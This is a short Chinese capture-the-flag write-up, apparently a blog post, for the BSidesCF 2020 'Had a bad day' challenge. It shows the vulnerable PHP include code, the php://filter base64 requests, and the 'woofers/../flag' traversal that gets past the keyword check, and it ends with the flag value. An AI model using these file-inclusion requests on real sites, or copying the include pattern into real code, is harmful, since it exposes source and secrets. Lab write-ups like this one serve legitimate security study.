[BSidesCF 2020]Had a bad day1

题目

这里有传参

文件包含使用伪协议读取flag

先读取index.php查看

复制代码
/index.php?category=php://filter/read=convert.base64-encode/resource=index

解码

index.php源码

php 复制代码
              <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php

尝试直接读取/index.php?category=woofers/../flag

php 复制代码
/index.php?category=php://filter/read=convert.base64-encode/resource=woofers/../flag

解码

拿下flag

flag{85254eba-a050-49cd-a3be-4e9859e51241}

相关推荐
tyqtyq221 小时前
HarmonyOS AI 应用开发实战:考研择校分析系统
人工智能·学习·考研·华为·生活·harmonyos
光影6272 小时前
MySQL基础入门
数据库·笔记·sql·学习·mysql·学习方法
海兰2 小时前
【实用程序】网页公开信息智能采集系统详细设计指南
人工智能·学习·自动化·采集信息
MartinYeung52 小时前
[论文学习]AgentDAM:自主Web Agent的隐私泄露评估
学习
光影6272 小时前
MySQL 进阶篇 —— 事务 / 外键 / 索引 / 高级查询
数据库·笔记·sql·学习·mysql
醉城夜风~4 小时前
MyBatis 基础CRUD全套实战学习笔记
笔记·学习·mybatis
blues92574 小时前
2026商超采购竹笋怎么选:从包装信息、货架周转到售后协同做判断
人工智能·科技·学习
Flandern11114 小时前
从“能跑”到“可运营”:Agent Harness 工程化建设指南
学习·agent·claudecode·harness
hj2862514 小时前
Shell 脚本完整学习笔记
chrome·笔记·学习
m0_377108144 小时前
cmake学习
学习